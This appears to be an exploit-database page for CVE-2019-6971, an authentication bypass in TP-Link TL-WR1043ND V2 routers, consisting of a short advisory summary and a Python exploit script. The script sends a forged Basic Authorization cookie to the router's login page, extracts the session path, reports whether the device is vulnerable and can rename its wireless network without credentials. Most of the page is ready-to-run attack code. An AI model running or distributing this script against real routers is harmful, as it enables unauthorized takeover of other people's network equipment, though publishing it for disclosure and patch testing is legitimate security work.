TP-Link TL-WR1043ND 2 - Authentication Bypass

vendor:

TL-WR1043ND V2

by:

Uriel Kosayev

9.8

CVSS

CRITICAL

Authentication Bypass

287

CWE

Product Name: TL-WR1043ND V2

Affected Version From: TL-WR1043ND V2

Affected Version To: TL-WR1043ND V2

Patch Exists: YES

Related CWE: CVE-2019-6971

CPE: h:tp-link:tl-wr1043nd_v2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: TL-WR1043ND V2

2019

TP-Link TL-WR1043ND 2 – Authentication Bypass

A vulnerability in TP-Link TL-WR1043ND V2 routers allows an attacker to bypass authentication and gain access to the router's web interface. This is due to the router's web interface not properly validating the Authorization header. An attacker can send a specially crafted HTTP request with a valid Authorization header to gain access to the router's web interface.

Mitigation:

Users should update their routers to the latest version available.

Source

Exploit-DB raw data:

# Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass
# Date: 2019-06-20
# Exploit Author: Uriel Kosayev
# Vendor Homepage: https://www.tp-link.com
# Version: TL-WR1043ND V2
# Tested on: TL-WR1043ND V2
# CVE : CVE-2019-6971
# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971

import requests

ascii = '''
  __________        __    _       __  
 /_  __/ __ \      / /   (_)___  / /__
  / / / /_/ /_____/ /   / / __ \/ //_/
 / / / ____/_____/ /___/ / / / / ,<   
/_/ /_/         /_____/_/_/ /_/_/|_|  

'''
print(ascii)
Default_Gateway = raw_input("Enter your TP-Link router IP: ")

# Constants
url = 'http://'
url2 = '/userRpm/LoginRpm.htm?Save=Save'
full = url + Default_Gateway + url2
# full = str(full)

# The full GET request with the cookie authorization hijacked
req_header = {
    'Host': '{}'.format(Default_Gateway),
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
    'Connection': 'close',
    'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
    'Upgrade-Insecure-Requests': '1'
}

try:
    response = requests.get(full, headers=req_header).content
except requests.exceptions.ConnectionError:
    print("Enter a valid Default Gateway IP address\nExiting...")
    exit()
generate = response.split('/')[3] # Gets the randomized URL "session ID"


option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")

if option_1 is 1:

    if generate in response:
        print('Vulnerable!\n')
        option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
        if option_2 is 2:
            newssid = raw_input('New name: ')
            ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(
                newssid)
            changessid_full = url + Default_Gateway + '/' + generate + ssid_url
            requests.get(changessid_full, headers=req_header)
            print('Changed to: {}'.format(newssid))
        else:
            ("Please choose the correct option.\nExiting...")
            exit()
    else:
        print('Not Vulnerable')
        exit()
else:
    print("Please choose the correct option.\nExiting...")
    exit()